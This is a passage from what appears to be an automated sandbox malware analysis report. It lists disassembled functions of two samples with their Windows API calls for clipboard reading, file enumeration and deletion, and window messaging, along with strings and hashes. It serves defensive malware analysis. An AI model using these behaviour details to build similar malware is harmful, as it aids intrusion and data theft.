                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Temp$FileNamePath
                                                          • String ID: aut
                                                          • API String ID: 3285503233-3010740371
                                                          • Opcode ID: 1c5584dbf2f8f683698c735a8b9ef0a6a8d27b13bf408ca7f2cb68fd5ff50d32
                                                          • Instruction ID: 1b01ba15a5e35a5bda8e333c21749f91a87be1c2a01b4781dc63c76dc497f384
                                                          • Opcode Fuzzy Hash: 1c5584dbf2f8f683698c735a8b9ef0a6a8d27b13bf408ca7f2cb68fd5ff50d32
                                                          • Instruction Fuzzy Hash: 9BD05E7754430DABDB50AB94EC0EFDABB2CDB44704F0042A1BE6C910B3DA7159D49B91
                                                          Function 00965FA1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00965FAB
                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00965FBE
                                                            • Part of subcall function 009457FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00945877
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: dcf93ce7d1f41f1622c25ca16b7763cf1b4a2e5d60d3e3546bd10cb830a77c28
                                                          • Instruction ID: 59c53ca3522d37203408bdb8d18185878359f8f64ac19bbde01b82c752d98183
                                                          • Opcode Fuzzy Hash: dcf93ce7d1f41f1622c25ca16b7763cf1b4a2e5d60d3e3546bd10cb830a77c28
                                                          • Instruction Fuzzy Hash: E9D0C9323A8311EBE664B774AC5BF9A6A14AB80B50F010829B25AEA1D1C9E458409754
                                                          Function 00965FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000,00000111,000001A0,00000000), ref: 00965FEB
                                                          • PostMessageW.USER32(00000000), ref: 00965FF2
                                                            • Part of subcall function 009457FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00945877
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: db8c5f88991fd3dfe10728228a2a1b7b9ec979a2727c506412b50c85569a90fa
                                                          • Instruction ID: d76207d201c77e9a3cf28556b931f80e7f4e3a36aaae088949299b60a2fe94f9
                                                          • Opcode Fuzzy Hash: db8c5f88991fd3dfe10728228a2a1b7b9ec979a2727c506412b50c85569a90fa
                                                          • Instruction Fuzzy Hash: 9CD0A932398310ABE624B770AC0BF8A2A10AB80B00F000828B24AEA1C0C9E068408708

                                                          Non-executed Functions

                                                          Function 00A04005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 009C0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009B2A58,?,00008000), ref: 009C02A4
                                                            • Part of subcall function 00A04FEC: GetFileAttributesW.KERNEL32(?,00A03BFE), ref: 00A04FED
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00A0407C
                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00A040CC
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A040DD
                                                          • FindClose.KERNEL32(00000000), ref: 00A040F4
                                                          • FindClose.KERNEL32(00000000), ref: 00A040FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 2649000838-1173974218
                                                          • Opcode ID: db5f87d299ffc046dc183ebea9dbc44f3177d9d634539b102a75d9f50375045a
                                                          • Instruction ID: 198e2d12e4012035c7abba71038dba603b25b4d94af4a684eb5ea4ac4684719e
                                                          • Opcode Fuzzy Hash: db5f87d299ffc046dc183ebea9dbc44f3177d9d634539b102a75d9f50375045a
                                                          • Instruction Fuzzy Hash: B63183710083899BC305EFA0D9A5DEFB7A8BE95314F444A1DF5E1931D1EB249909C763
                                                          Function 00A0C2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00A0C329
                                                          • _wcscmp.LIBCMT ref: 00A0C359
                                                          • _wcscmp.LIBCMT ref: 00A0C36E
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00A0C37F
                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00A0C3AF
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                                          • String ID:
                                                          • API String ID: 2387731787-0
                                                          • Opcode ID: 9779cf3736b3ffe6e556074c7d10e675309653138f0f3d30bf1009b2c3f7aaac
                                                          • Instruction ID: 014a5b79aaea63c8b25e3412bf19d5c16ee856c9bffff8762fdc7560a6c16f8f
                                                          • Opcode Fuzzy Hash: 9779cf3736b3ffe6e556074c7d10e675309653138f0f3d30bf1009b2c3f7aaac
                                                          • Instruction Fuzzy Hash: 53517D75A046069FD714DF68D4A0EAAB3E4FF89320F10461DF9568B3A1DB30AD05CB92
                                                          Function 00A2A041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00A2A0F7
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00A2A1B0
                                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 00A2A1CC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window
                                                          • String ID: 0
                                                          • API String ID: 2326795674-4108050209
                                                          • Opcode ID: b593bce3a6ca8af8381c11a0bab4355d2a359de557400091a79968d0cceae188
                                                          • Instruction ID: 264510b08c156c103a2cd6bd90697971695c067ce50eefd3faf50028ec4e6346
                                                          • Opcode Fuzzy Hash: b593bce3a6ca8af8381c11a0bab4355d2a359de557400091a79968d0cceae188
                                                          • Instruction Fuzzy Hash: 4702FC30108320AFD715CF18EC49BABBBE4FFA9714F04852DF999962A1C775D845CB92
                                                          Function 00A14632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenClipboard.USER32(00A30980), ref: 00A1465C
                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00A1466A
                                                          • GetClipboardData.USER32(0000000D), ref: 00A14672
                                                          • CloseClipboard.USER32 ref: 00A1467E
                                                          • GlobalLock.KERNEL32(00000000), ref: 00A1469A
                                                          • CloseClipboard.USER32 ref: 00A146A4
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00A146B9
                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00A146C6
                                                          • GetClipboardData.USER32(00000001), ref: 00A146CE
                                                          • GlobalLock.KERNEL32(00000000), ref: 00A146DB
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00A1470F
                                                          • CloseClipboard.USER32(00000001,00000000), ref: 00A1481F
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                          • String ID:
                                                          • API String ID: 3222323430-0
                                                          • Opcode ID: 139ba06d0b972622dd130fa1ae9745f60ea9ce42dad3a75b8110810eb838676f
                                                          • Instruction ID: 78efd09b64a770d84adac3b56dea7b9e234156e3f8d2fd64d9597844a74e8663
                                                          • Opcode Fuzzy Hash: 139ba06d0b972622dd130fa1ae9745f60ea9ce42dad3a75b8110810eb838676f
                                                          • Instruction Fuzzy Hash: 5551AE31204305AFD300EFA4EDAAFAE77A8AFC8B11F004529F656D21E1DF70D9458B62
                                                          Function 009C0429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 009B1821: _memmove.LIBCMT ref: 009B185B
                                                          • GetForegroundWindow.USER32(00A30980,?,?,?,?,?), ref: 009C04E3
                                                          • IsWindow.USER32(?,?,?,?,00A30980,?,?,00000000,00A30980), ref: 009F66BB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: Window$Foreground_memmove
                                                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                          • API String ID: 3828923867-1919597938
                                                          • Opcode ID: 8d00ee7af4b65db0ee8dd35de0bd3349ecc2ecda4300b60d93264c71bb298dbe
                                                          • Instruction ID: a754046cace63f4df3282687c2dcd7cacb06815c301dde179c842a9be48c0b83
                                                          • Opcode Fuzzy Hash: 8d00ee7af4b65db0ee8dd35de0bd3349ecc2ecda4300b60d93264c71bb298dbe
                                                          • Instruction Fuzzy Hash: 30D10630504306DBCB04EF20C991BAABBB4BFD5354F104A1DF996935A2DB30FA59CB92
                                                          Function 00A2441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 00A244AC
                                                          • SendMessageW.USER32(?,00001032,00000000,00000000,00A30980), ref: 00A2456C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: BuffCharMessageSendUpper
                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                          • API String ID: 3974292440-719923060
                                                          • Opcode ID: cbadc7db485ee26509c062b4e0b71691a1398bf9866e223045dfe6c0802be19e
                                                          • Instruction ID: 9a67285f53d1264cb9f43046325f5ebb010eab6631621a7cdfaa6b9140a406b9
                                                          • Opcode Fuzzy Hash: cbadc7db485ee26509c062b4e0b71691a1398bf9866e223045dfe6c0802be19e
                                                          • Instruction Fuzzy Hash: 57A15E302143219FCB14EF64D951B6AB7A5BFC9324F10496CF8AA5B2D2DB70ED09CB91
                                                          Function 00A082D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #8.OLEAUT32(00000000,0000004E,?,?,?,?,?,?,0000002A,00000000,00A30980), ref: 00A0831A
                                                          • #10.WSOCK32(00037269,?,?,?,?,?,?,0000002A,00000000,00A30980), ref: 00A08323
                                                          • #9.WSOCK32(00037269,?,?,?,?,?,0000002A,00000000,00A30980), ref: 00A0832F
                                                          • #185.OLEAUT32(?,?,?,?,0000002A,00000000,00A30980), ref: 00A0841D
                                                          • __swprintf.LIBCMT ref: 00A0844D
                                                          • #220.OLEAUT32(?,?,?,?,?,00000029,00000000,Default), ref: 00A08479
                                                          • #8.OLEAUT32(?,?,00037269,00000000), ref: 00A0852A
                                                          • #6.OLEAUT32(?,?), ref: 00A085BE
                                                          • #9.WSOCK32(?), ref: 00A08618
                                                          • #9.WSOCK32(?), ref: 00A08627
                                                          • #8.OLEAUT32(00000000,0000004E,?,00037269,00000000), ref: 00A08665
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: #185#220__swprintf
                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                          • API String ID: 2563594795-3931177956
                                                          • Opcode ID: a1968bf3dd836f415ae7820543c0c9e608d94a0e1c6e5eb6893188cb00153769
                                                          • Instruction ID: 78c10ef4562d0d24f33014526e3339eb9ca42e17bd0c895562c9d6fa6d0580d9
                                                          • Opcode Fuzzy Hash: a1968bf3dd836f415ae7820543c0c9e608d94a0e1c6e5eb6893188cb00153769
                                                          • Instruction Fuzzy Hash: 1CD1E231A0461DDBCB249FA1E894B6EB7B4BF85B10F148559E5859F2C0CF38EC40DB96
                                                          Function 00A0E25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?), ref: 00A0E31F
                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A0E32F
                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A0E33B
                                                          • __wsplitpath.LIBCMT ref: 00A0E399
                                                          • _wcscat.LIBCMT ref: 00A0E3B1
                                                          • _wcscat.LIBCMT ref: 00A0E3C3
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A0E3D8
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00A0E3EC
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00A0E41E
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00A0E43F
                                                          • _wcscpy.LIBCMT ref: 00A0E44B
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A0E48A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                          • String ID: *.*
                                                          • API String ID: 3566783562-438819550
                                                          • Opcode ID: c65d9cde5508b62d6b400f099972f14d1789c172a4e02efa9436e3bf41054161
                                                          • Instruction ID: 464c3b9f0f7d338cf4246437bce7e5a26e8cf14fa83a79dbce56e75e5dcb448e
                                                          • Opcode Fuzzy Hash: c65d9cde5508b62d6b400f099972f14d1789c172a4e02efa9436e3bf41054161
                                                          • Instruction Fuzzy Hash: 116148725042499FCB10EF60D854E9FB7E8BF89310F04891EF99987291EB36E945CB92
                                                          Function 00A0A27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadStringW.USER32(00000066,?,00000FFF), ref: 00A0A2C2
                                                            • Part of subcall function 009B1A36: _memmove.LIBCMT ref: 009B1A77
                                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00A0A2E3
                                                          • __swprintf.LIBCMT ref: 00A0A33C
                                                          • __swprintf.LIBCMT ref: 00A0A355
                                                          • _wprintf.LIBCMT ref: 00A0A3FC
                                                          • _wprintf.LIBCMT ref: 00A0A41A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 311963372-3080491070
                                                          • Opcode ID: 49b91002472b628b8feef545679e86a70dac4c8c5471db597d2ea81474ee7fae
                                                          • Instruction ID: cac3a0e3850d14d934523e78f5233a5f612476b4c5dd9628280e2c5b1fe647f7
                                                          • Opcode Fuzzy Hash: 49b91002472b628b8feef545679e86a70dac4c8c5471db597d2ea81474ee7fae
                                                          • Instruction Fuzzy Hash: 0A51CB72900209BACF14EBE0EE66FEEB778AF54340F504165F505B20A2EB712F59CB61
                                                          Function 00A00065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,?,?,009EF8B8,00000001,0000138C,00000001,?,00000001,?,00A13FF9,?), ref: 00A0009A
                                                          • LoadStringW.USER32(00000000,?,009EF8B8,00000001,0000138C,00000001,?,00000001,?,00A13FF9,?,00000001,?,00A13FF9,00000040,00000064), ref: 00A000A3
                                                            • Part of subcall function 009B1A36: _memmove.LIBCMT ref: 009B1A77
                                                          • GetModuleHandleW.KERNEL32(00000000,00A67310,?,00000FFF,?,?,009EF8B8,00000001,0000138C,00000001,?,00000001,?,00A13FF9,?,00000001), ref: 00A000C5
                                                          • LoadStringW.USER32(00000000,?,009EF8B8,00000001,0000138C,00000001,?,00000001,?,00A13FF9,?,00000001,?,00A13FF9,00000040,00000064), ref: 00A000C8
                                                          • __swprintf.LIBCMT ref: 00A00118
                                                          • __swprintf.LIBCMT ref: 00A00129
                                                          • _wprintf.LIBCMT ref: 00A001D2
                                                          • MessageBoxW.USER32(00000000,?,?,00011010,?,Error: ,00A33B88,?), ref: 00A001E9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                          • API String ID: 984253442-2268648507
                                                          • Opcode ID: 770c5a5662d11750936190faffd2aecf2621cfd2896d3d84d3df49e7569de4fb
                                                          • Instruction ID: 9982eaf68c0438b604e2ba65a024ec96ffeadbab98a4d4eebf17e2d99186d2ee
                                                          • Opcode Fuzzy Hash: 770c5a5662d11750936190faffd2aecf2621cfd2896d3d84d3df49e7569de4fb
                                                          • Instruction Fuzzy Hash: 90416E7280011DAACF14EBE0DEA6FEEB778AF98751F900125F505B2092DB346F49CB61
                                                          Function 00A2C0A5 Relevance: 22.6, APIs: 15, Instructions: 130filememorywindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00A2982C,?,?), ref: 00A2C0C8
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00A2982C,?,?,00000000,?), ref: 00A2C0DF
                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00A2982C,?,?,00000000,?), ref: 00A2C0EA
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00A2982C,?,?,00000000,?), ref: 00A2C0F7
                                                          • GlobalLock.KERNEL32(00000000), ref: 00A2C100
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A2982C,?,?,00000000,?), ref: 00A2C10F
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00A2C118
